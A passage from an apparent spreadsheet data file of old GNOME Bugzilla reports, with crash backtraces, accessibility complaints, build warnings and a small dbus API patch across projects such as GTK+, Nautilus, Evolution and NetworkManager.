data = (DialogFilledData *) 0x872c8a0
sog = (SheetObjectGraphic *) 0x8870d88
so = (SheetObject *) 0x8870d88
gdk = (GdkColor *) 0x0
#5  0x4038fdf5 in gnome_dialog_marshal_signal_1 (object=0x8876af0 func=0x80cba14  func_data=0x872c8a0 args=0xbfffe930)
    at gnome-dialog.c:145
args = (GtkArg *) 0xfffffe00
#6  0x4052a0d6 in gtk_handlers_run (handlers=0x8884658 signal=0xbfffe8d0 object=0x8876af0 params=0xbfffe930 after=0) at gtksignal.c:1917
handlers = (GtkHandler *) 0x8884658
handlers_next = (GtkHandler *) 0x8876af0
#7  0x40529537 in gtk_signal_real_emit (object=0x8876af0 signal_id=148 params=0xbfffe930) at gtksignal.c:1477
1477	in gtksignal.c
return_val = -512
signal = {signal_id = 148 object_type = 74517 name = 0x83466e0 clicked function_offset = 340 marshaller = 0x4038fde0  
  return_val = 1 signal_flags = 2 nparams = 1 params = 0x833fd30 hook_list = 0x0}
handlers = (GtkHandler *) 0x0
signal_func = 0
emission = (GtkEmission *) 0x81ef604
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-10-09 23:57 -------
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>LIBGNOMEUI-163973</t>
  </si>
  <si>
    <t>User/password dialog is not kept on top</t>
  </si>
  <si>
    <t>Use connect to server to create a new server icon (I test with webdav). Drag a
file to it. When it asks for a password wait. The copy/move progress window
will appear on top of the password dialog. This tends to disturb people who are
just trying to remember their password.
The second problem is that when pressing cancel in the password dialog it will
just pop up a new password dialog.</t>
  </si>
  <si>
    <t>libgnomeui-maint</t>
  </si>
  <si>
    <t>GAZPACHO-171879</t>
  </si>
  <si>
    <t>The revert dialog should use stock item</t>
  </si>
  <si>
    <t>The revert button in the revert dialog should use a stock item.</t>
  </si>
  <si>
    <t>NAUTILUS-142910</t>
  </si>
  <si>
    <t>no Low Contrast icons for a11y themeing (File Management Icon)</t>
  </si>
  <si>
    <t>Using Gnome built with Nautilus 2.6.1 source tarball
- Change the theme to High Contrast Large Print Inverse
- Open nautilus and browser to preferences.
 Notice that the File Management icon does not change to suit this accessible
theme.
It should have the following versions:
  High Contrast
  High Contrast Inverse
  Low Contrast
  Low Contrast Inverse</t>
  </si>
  <si>
    <t>BANSHEE-443048</t>
  </si>
  <si>
    <t>Device - USB Mass Storage</t>
  </si>
  <si>
    <t>Ejecting the DAP shouldn't HAL Eject unless required</t>
  </si>
  <si>
    <t>Mass Storage DAP plugin upon Eject should not perform a HAL Eject operation on the device unless the device says it requires eject.</t>
  </si>
  <si>
    <t>gabriel.burt</t>
  </si>
  <si>
    <t>GTK+-153212</t>
  </si>
  <si>
    <t>Widget: GtkFileChooser</t>
  </si>
  <si>
    <t>Have the Paste kbd shortcut jump to the location in the buffer</t>
  </si>
  <si>
    <t>Typing Ctrl+V (in the default shortcuts) would select the file pointed to in
the clipboard buffer. For example if /etc/resolv.conf was in the clipboard
buffer the Ctrl+V combination should bring up the file chooser in the same
state as typing:
Ctrl+L (followed by) /etc/resolv.conf</t>
  </si>
  <si>
    <t>LIBXSLT-348959</t>
  </si>
  <si>
    <t>LIBXSLT</t>
  </si>
  <si>
    <t>libxslt does not print line number if XPath error: Invalid type</t>
  </si>
  <si>
    <t>After executing xsltproc I get something wrong without printling line number.
===
[yozh@dhcp218-152:~/tmp/x]% xsltproc test.xsl test.xml
XPath error : Invalid type
                begin (won't get end)
zsh: exit 10    xsltproc test.xsl test.xml
===
xsltproc produces incomplete XML (there is no line end (you don't see me) in the output).
xsltproc does not print line number if this is error.
Same things when executing template using API.
File test.xml:
===
&lt;page
        xmlns:xi=http://www.w3.org/2001/XInclude&gt;
            bbb
===
test.xsl:
===
                begin (won't get end)
                end (you don't see me)
===
Version:
===
[yozh@dhcp218-152:~/tmp/x]% xsltproc --version                                                                   
Using libxml 20626 libxslt 10117 and libexslt 813
xsltproc was compiled against libxml 20626 libxslt 10117 and libexslt 813
libxslt 10117 was compiled against libxml 20626
libexslt 813 was compiled against libxml 20626
===
With current behaviour it is very hard to find where is error in template.</t>
  </si>
  <si>
    <t>GNOME-VFS-149205</t>
  </si>
  <si>
    <t>File operations</t>
  </si>
  <si>
    <t>please change #if HAVE_OPENSSL to #ifdef in gnome-vfs-ssl.c</t>
  </si>
  <si>
    <t>ifdef perhaps.
gnome-vfs-ssl.c:416:5: warning: undefined preprocessor identifier 'HAVE_OPENSSL'
gnome-vfs-ssl.c:493:5: warning: undefined preprocessor identifier 'HAVE_OPENSSL'
gnome-vfs-ssl.c:556:5: warning: undefined preprocessor identifier 'HAVE_OPENSSL'
gnome-vfs-ssl.c:616:5: warning: undefined preprocessor identifier 'HAVE_OPENSSL'</t>
  </si>
  <si>
    <t>EVOLUTION-264080</t>
  </si>
  <si>
    <t>addressbook gui component needs to be linked with libcamel</t>
  </si>
  <si>
    <t>This is from http://bugs.gentoo.org/show_bug.cgi?id=61603 ... libcamel
needs to be linked into the addressbook/gui/component otherwise the
component doesnt want to load.. It probably works in most cases when the
mailer component is loaded first since camel is already there I guess..
Simple adding camel to LIBADD in there works here..</t>
  </si>
  <si>
    <t>PYGTK-171771</t>
  </si>
  <si>
    <t>gtk.Dialog.set_alternative_button_order does not exist</t>
  </si>
  <si>
    <t>Despite it being in the documentation and an entry in the ChangeLog there is
no wrapper for gtk_dialog_set_alternative_button_order. I suspect this is a
result of a missed file in a commit but if not I can implement it pretty easily.</t>
  </si>
  <si>
    <t>BANSHEE-710418</t>
  </si>
  <si>
    <t>Other Extensions</t>
  </si>
  <si>
    <t>MeeGo extension not ported to GTK3</t>
  </si>
  <si>
    <t>When building with --enable-meego the build fails with the following errors:
./Banshee.MeeGo/MediaPanelContents.cs(21733): error CS0115: `Banshee.MeeGo.MediaPanelContents.OnExposeEvent(Gdk.EventExpose)' is marked as an override but no suitable method found to override
./Banshee.MeeGo/MediaPanelContents.cs(23163): error CS0234: The type or namespace name `Region' does not exist in the namespace `Gdk'. Are you missing an assembly reference?
./Banshee.MeeGo/MeeGoHeaderBox.cs(10033): error CS0115: `Banshee.MeeGo.MeeGoHeaderBox.OnExposeEvent(Gdk.EventExpose)' is marked as an override but no suitable method found to override
./Banshee.MeeGo/MeeGoHeaderBox.cs(11463): error CS0234: The type or namespace name `Region' does not exist in the namespace `Gdk'. Are you missing an assembly reference?</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-162192</t>
  </si>
  <si>
    <t>Sound</t>
  </si>
  <si>
    <t>Help in Sound preferences doesn't work</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/4404
I opened the Sound preferences in GNOME (Computer-Desktop Preferences-Sound).
After this I clicked on Help to get help on sound configuration.
I then got an error that said The selected page can not be found in this document</t>
  </si>
  <si>
    <t>GHEX-101457</t>
  </si>
  <si>
    <t>Selected text is not visibile with inverse themes and highcontrast themes</t>
  </si>
  <si>
    <t>I could see two problems with the color that is used for text selection in 
ghex:
1. When using an inverse high contrast theme you can't read any of the 
selected text at all. It is same for HighContrast case also.
2. With the current text selection color for Default theme It can be 
observed that the highlighted text in ghex will not be shown in secondary 
highlight and hence it is difficult to make out which window currently has 
the focus (as the primary focus will be in both ghex and the other window).
From the accessibility perspective problem seems to be a critical stuff 
becos the user with inverse themes will not see the selected text.</t>
  </si>
  <si>
    <t>pasupathi.duraisamy</t>
  </si>
  <si>
    <t>ANJUTA-506740</t>
  </si>
  <si>
    <t>plugins: editor: scintilla</t>
  </si>
  <si>
    <t>ANJUTA</t>
  </si>
  <si>
    <t>ianjuta_editor_get_text crash if request text past the buffer length</t>
  </si>
  <si>
    <t>ianjuta_editor_get_text allows to read length characters starting at position from the text editor.
In the documentation it's written that if the length exceed the editor buffer length it gets characters up to the end of the buffer. It's doesn't work like this at least with scintilla. 
ianjuta_editor_get_text computes the end position by adding length and sends the command SCI_GETTEXTRANGE to scintilla. In scintialla/Editor.cxx there are the following code to handle this command:
  int cpMax = tr-&gt;chrg.cpMax
  if (cpMax == -1)
    cpMax = pdoc-&gt;Length()
  PLATFORM_ASSERT(cpMax Length())
cpMax is never -1 but it could be greater than the length of the buffer (pdoc-&gt;Length()) and in this case we get an assertion failure.
I think the documented behavior is easier to use and this could be fixed easily by changing scintilla replacing the assertion with a condition. But I don't know if we could get this change in scintilla. So perhaps this should be handled in the editor plugin. I don't know what is the behavior of GtkSourceView in this case.</t>
  </si>
  <si>
    <t>naba</t>
  </si>
  <si>
    <t>seb.sfo</t>
  </si>
  <si>
    <t>ATK-113898</t>
  </si>
  <si>
    <t>atk</t>
  </si>
  <si>
    <t>need role for word-completion popups</t>
  </si>
  <si>
    <t>looks as though word-completion in GTK+ 2.4 will use popups that are
autogenerated (i.e. not user-invoked).  In order for screenreaders to deal
gracefully with this I think we need a special role for
wordcompletion/entry-completion
ATK_ROLE_AUTOCOMPLETE</t>
  </si>
  <si>
    <t>bill.haneman</t>
  </si>
  <si>
    <t>GNOME-APPLETS-133161</t>
  </si>
  <si>
    <t>keyboard indicator (gswitchit)</t>
  </si>
  <si>
    <t>Cleanup of deprecated function</t>
  </si>
  <si>
    <t>This patch removes usage of g_basename() which is deprecated.</t>
  </si>
  <si>
    <t>TOTEM-322228</t>
  </si>
  <si>
    <t>Accesskeys in display tab in preferences</t>
  </si>
  <si>
    <t>Duplicate accesskey of R.
Sat_u_ration and _H_ue accesskeys focus wrong slider</t>
  </si>
  <si>
    <t>piers</t>
  </si>
  <si>
    <t>EVOLUTION-209501</t>
  </si>
  <si>
    <t>Appointment Editor has Save changes? but Contact editor doesn't</t>
  </si>
  <si>
    <t>Closing a Contact Editor window without saving causes an immediate close. 
Closing a calendar editor without saving brings up a dialog asking if I
want to save before closing.
It doesn't matter much to me which behavior we use but we should use the
same one in both cases.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-154978</t>
  </si>
  <si>
    <t>Background</t>
  </si>
  <si>
    <t>Background properties crashes when using picture on network drive</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: control-center
Severity: normal
Version: GNOME2.6.1 2.6.1
Gnome-Distributor: Debian
Synopsis: Background properties crashes when using picture on network drive
Bugzilla-Product: control-center
Bugzilla-Component: background
Bugzilla-Version: 2.6.1
BugBuddy-GnomeVersion: 2.0 (2.6.1.1)
Description:
Description of the crash:
(see title and steps to reproduce)
Steps to reproduce the crash:
1. Mount a samba share using Gnome's built-in network browser
2. Drag a picture from the share into the gnome-background-properties
app
3. 
Expected Results:
Not crashing.. perhaps cache a local copy of the picture to use.
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-background-properties'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(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Thread debugging using libthread_db enabled]
[New Thread 1087815936 (LWP 3525)]
[New Thread 1098156976 (LWP 3528)]
[Thread debugging using libthread_db enabled]
[New Thread 1087815936 (LWP 3525)]
[New Thread 1098156976 (LWP 3528)]
[Thread debugging using libthread_db enabled]
[New Thread 1087815936 (LWP 3525)]
[New Thread 1098156976 (LWP 3528)]
(no debugging symbols found)...[New Thread 1097890736 (LWP 3527)]
(no debugging symbols found)...[New Thread 1096735664 (LWP 3526)]
(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0x409e3431 in __waitpid_nocancel () from
/lib/tls/libpthread.so.0
#0  0x409e3431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0x400e7f48 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0x0804cc69 in _start ()
#4  0x08863290 in ?? ()
#5  0x08065470 in ?? ()
#6  0x00000000 in ?? ()
#7  0x00000000 in ?? ()
#8  0x00000000 in ?? ()
#9  0x00000000 in ?? ()
#10 0x00000020 in ?? ()
#11 0x409cabc8 in ?? () from /usr/lib/libgobject-2.0.so.0
#12 0x00000000 in ?? ()
#13 0x080b3cb0 in ?? ()
#14 0x00000000 in ?? ()
#15 0x08863508 in ?? ()
#16 0xbffff050 in ?? ()
#17 0x0827c0c0 in ?? ()
#18 0xbfffee28 in ?? ()
#19 0x409bbf77 in g_value_peek_pointer () from
/usr/lib/libgobject-2.0.so.0
#20 0x4039a161 in _gtk_marshal_VOID__OBJECT_INT_INT_BOXED_UINT_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0x4099bc20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#22 0x409afc25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#23 0x409aebe7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#24 0x409aefd4 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#25 0x403285a6 in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
#26 0x40399485 in _gtk_marshal_VOID__BOXED_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
#27 0x4099bc20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#28 0x409afc25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#29 0x409aebe7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#30 0x409aefd4 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#31 0x403dbd7d in _gtk_selection_property_notify ()
   from /usr/lib/libgtk-x11-2.0.so.0
#32 0x403db955 in _gtk_selection_notify () from
/usr/lib/libgtk-x11-2.0.so.0
#33 0x403979f4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#34 0x4099bfb7 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#35 0x4099bc20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#36 0x409af655 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#37 0x409ae9be in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#38 0x409aeee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#39 0x404968e7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#40 0x40394d7a in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#41 0x40593195 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#42 0x40a0c932 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#43 0x40a0da28 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#44 0x40a0dd60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#45 0x40a0e3a3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#46 0x403945a3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#47 0x080501ba in main ()
Thread 4 (Thread 1096735664 (LWP 3526)):
#0  0x40c21d35 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0x40a0e8a6 in g_main_loop_get_context () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#2  0x40a0dce0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x40a0e3a3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x40972eb2 in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0x40a2794d in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x409dd9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
Thread 3 (Thread 1097890736 (LWP 3527)):
#0  0x409e0115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x406771f4 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0x4067724f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0x40a2794d in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x409dd9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 1098156976 (LWP 3528)):
#0  0x409e0115 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x406771f4 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#2  0x4067724f in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#3  0x40a2794d in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x409dd9b4 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 1087815936 (LWP 3525)):
#0  0x409e3431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x400e7f48 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x0804cc69 in _start ()
No symbol table info available.
#4  0x08863290 in ?? ()
No symbol table info available.
#5  0x08065470 in ?? ()
No symbol table info available.
#6  0x00000000 in ?? ()
No symbol table info available.
#7  0x00000000 in ?? ()
No symbol table info available.
#8  0x00000000 in ?? ()
No symbol table info available.
#9  0x00000000 in ?? ()
No symbol table info available.
#10 0x00000020 in ?? ()
No symbol table info available.
#11 0x409cabc8 in ?? () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x00000000 in ?? ()
No symbol table info available.
#13 0x080b3cb0 in ?? ()
No symbol table info available.
#14 0x00000000 in ?? ()
No symbol table info available.
#15 0x08863508 in ?? ()
No symbol table info available.
#16 0xbffff050 in ?? ()
No symbol table info available.
#17 0x0827c0c0 in ?? ()
No symbol table info available.
#18 0xbfffee28 in ?? ()
No symbol table info available.
#19 0x409bbf77 in g_value_peek_pointer () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x4039a161 in _gtk_marshal_VOID__OBJECT_INT_INT_BOXED_UINT_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x4099bc20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x409afc25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0x409aebe7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x409aefd4 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x403285a6 in gtk_drag_dest_find_target ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#26 0x40399485 in _gtk_marshal_VOID__BOXED_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0x4099bc20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x409afc25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x409aebe7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x409aefd4 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0x403dbd7d in _gtk_selection_property_notify ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x403db955 in _gtk_selection_notify () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x403979f4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#34 0x4099bfb7 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x4099bc20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x409af655 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0x409ae9be in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0x409aeee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#39 0x404968e7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x40394d7a in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0x40593195 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#42 0x40a0c932 in g_main_depth () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#43 0x40a0da28 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#44 0x40a0dd60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#45 0x40a0e3a3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#46 0x403945a3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0x080501ba in main ()
No symbol table info available.
#0  0x409e3431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-10-09 13:36 -------
Unknown version 2.6.1 in product control-center. Setting version to 1.4.0.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product control-center.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was justin@rotogoober.gotdns.org.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GNOME-VFS-139602</t>
  </si>
  <si>
    <t>gnome-vfs fails to determing the type of mount points outside /mnt</t>
  </si>
  <si>
    <t>gnome-vfs fails to determine the type of the removable device for distros that
mounts removable media outside /mnt (like debian that mounts the cdrom at /cdrom).
A workaround is to usr /dev/cdrom in /etc/fstab that will however cause the
gnome-volume-manager to fail since hal reports (in my case) /dev/hdc.
I have made a patch that adds a fallback that detects this kinds of mountpoints.</t>
  </si>
  <si>
    <t>snaggen</t>
  </si>
  <si>
    <t>GALEON-58963</t>
  </si>
  <si>
    <t>Cannot switch tabs with keyboard when loading page</t>
  </si>
  <si>
    <t>Create two tabs. Now in one type a url (ie slashdot.org). Now press
Ctrl+. (should switch to the next tab.) It doesn't - perhaps the focus is
still in the URL bar? Click on the content area and try Ctrl+. again. It
doesn't work until the page is finished loading.</t>
  </si>
  <si>
    <t>hoserhead</t>
  </si>
  <si>
    <t>NETWORKMANAGER-353838</t>
  </si>
  <si>
    <t>API</t>
  </si>
  <si>
    <t>NM uses deprecated dbus functions</t>
  </si>
  <si>
    <t>hi
version 0.6.4-1 of network-manager uses a deprecated dbus function that
is removed in dbus &gt;= 0.90
The function dbus_connection_disconnect() was removed and can be
replaced by dbus_connection_close(). Attached is a patch that fixes
this.
--- ./gnome/libnm_glib/libnm_glib.c.old 2006-08-24 18:08:22.200388750 +0200
+++ ./gnome/libnm_glib/libnm_glib.c     2006-08-24 18:08:33.353085750 +0200
@@ -2307 +2307 @@
        {
                /* Try to reactivate our connection to dbus on the next pass through the event loop */
                ctx-&gt;nm_state = LIBNM_NO_DBUS
-               dbus_connection_disconnect (ctx-&gt;dbus_con)
+               dbus_connection_close (ctx-&gt;dbus_con)
                libnm_glib_schedule_dbus_watcher (ctx)
        }
        else if (dbus_message_is_signal (message DBUS_INTERFACE_DBUS NameOwnerChanged))
@@ -4447 +4447 @@
                g_main_loop_unref (ctx-&gt;g_main_loop)
        if (ctx-&gt;dbus_con)
-               dbus_connection_disconnect (ctx-&gt;dbus_con)
+               dbus_connection_close (ctx-&gt;dbus_con)
        if (ctx-&gt;callbacks_lock)
                g_mutex_free (ctx-&gt;callbacks_lock)
(thank's goes to slomo cause he found the bug and for providing the patch)</t>
  </si>
  <si>
    <t>giskard</t>
  </si>
  <si>
    <t>GLOM-526117</t>
  </si>
  <si>
    <t>design</t>
  </si>
  <si>
    <t>GLOM</t>
  </si>
  <si>
    <t>lockup when adding large JPG</t>
  </si>
  <si>
    <t>adding a 3.3Mb JPG in the details view sends glom's CPU usage over 95% and if not killed in time locks up the whole system eventually. It is thrashing too.
A similarly large PNG while it takes about 10s to get into the db does not have the same effects and does not peg the CPU.</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-327936</t>
  </si>
  <si>
    <t>bug data</t>
  </si>
  <si>
    <t>Name of rhythmbox component is misspelled: should be Programmatic interfaces</t>
  </si>
  <si>
    <t>Please describe the problem:
Currently the component name is:
Prgrammatic interfaces
should be:
Programmatic interfaces
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:
Not really a rhythmbox bug but in bugzilla but I didn't know where else to
file it.</t>
  </si>
  <si>
    <t>GNOME-CORE-35951</t>
  </si>
  <si>
    <t>pilot_applet access violation</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.4
Synopsis: pilot_applet access violation
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.2-9
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.5
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-8_helix_1
gnome-core: gnome-core 1.2.4
Description:
Invoking pilot_applet on the command line causes an segfault
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
0x405fcce9 in __wait4 () from /lib/libc.so.6
#0  0x405fcce9 in __wait4 () from /lib/libc.so.6
#1  0x40668aa8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4015ff58 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x4002be6d in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
#5  0x807918d in load_queued_externs ()
#6  0x4002d603 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
#7  0x4005e304 in ORBit_POA_handle_request (recv_buffer=0x80fe1c0 
    poa=0x80f7278) at orbit_poa.c:507
#8  0x400604d2 in ORBit_handle_incoming_request (recv_buffer=0x80fe1c0)
    at server.c:89
#9  0x400606f9 in ORBit_handle_incoming_message (recv_buffer=0x80fe1c0)
    at server.c:159
#10 0x40078420 in giop_main_handle_connection (connection=0x81c7580)
    at connection.c:1211
#11 0x400e9819 in orb_handle_connection () from /usr/lib/libgnorba.so.27
#12 0x400931a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#13 0x40094987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#14 0x40095001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#15 0x400951cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#16 0x402abf87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#17 0x8056082 in main ()
#18 0x40567bfc in __libc_start_main (main=0x8055d70  argc=5 
    ubp_av=0xbffff8d4 init=0x8053370  fini=0x8093b5c  
    rtld_fini=0x4000d674  stack_end=0xbffff8cc)
    at ../sysdeps/generic/libc-start.c:118
#0  0x405fcce9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40668aa8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4015ff58 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x4002be6d in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
#5  0x807918d in load_queued_externs ()
No symbol table info available.
#6  0x4002d603 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
#7  0x4005e304 in ORBit_POA_handle_request (recv_buffer=0x80fe1c0 
    poa=0x80f7278) at orbit_poa.c:507
servant = (PortableServer_ServantBase *) 0x81c6ab0
cookie = 0xbffff648
obj_impl = (ORBit_POAObject *) 0x81c7248
tmp_obj_impl = {object_id = 0xc0 servant = 0x91 poa = 0x40666f60 
  orb = 0x80f7278 objnum = 135258560 rand_data = \200u\034\bxÃ¶Ã¿Â¿}
skel = 0
imp = 0x8079080
ev = {_major = CORBA_NO_EXCEPTION _repo_id = 0x0 _params = 0x0 _any = 0x0}
send_buffer = (GIOPSendBuffer *) 0xbffff630
opname = (guchar *) 0x81c6ab0 
oid = (PortableServer_ObjectId *) 0x81c7274
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:18 -------
This bug was previously known as bug 35951 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=35951
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (brf@brainon.ch) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>brf</t>
  </si>
  <si>
    <t>GTK+-162988</t>
  </si>
  <si>
    <t>document the different kinds of shortcuts in the file chooser</t>
  </si>
  <si>
    <t>while only application-provided shortcuts have direct api relevance it would
probably be good to discuss bookmarks and volumes somewhere and maybe document
the .gtk-bookmarks file format.</t>
  </si>
  <si>
    <t>GSTREAMER-446972</t>
  </si>
  <si>
    <t>warning when compiling  gstoggdemux.c</t>
  </si>
  <si>
    <t>with mingw (core2 duo) I get those warnings:
gstoggdemux.c: In function `gst_ogg_demux_read_chain':
gstoggdemux.c:2393: warning: long unsigned int format gint arg (arg 8)
gstoggdemux.c:2412: warning: long unsigned int format gint arg (arg 8)
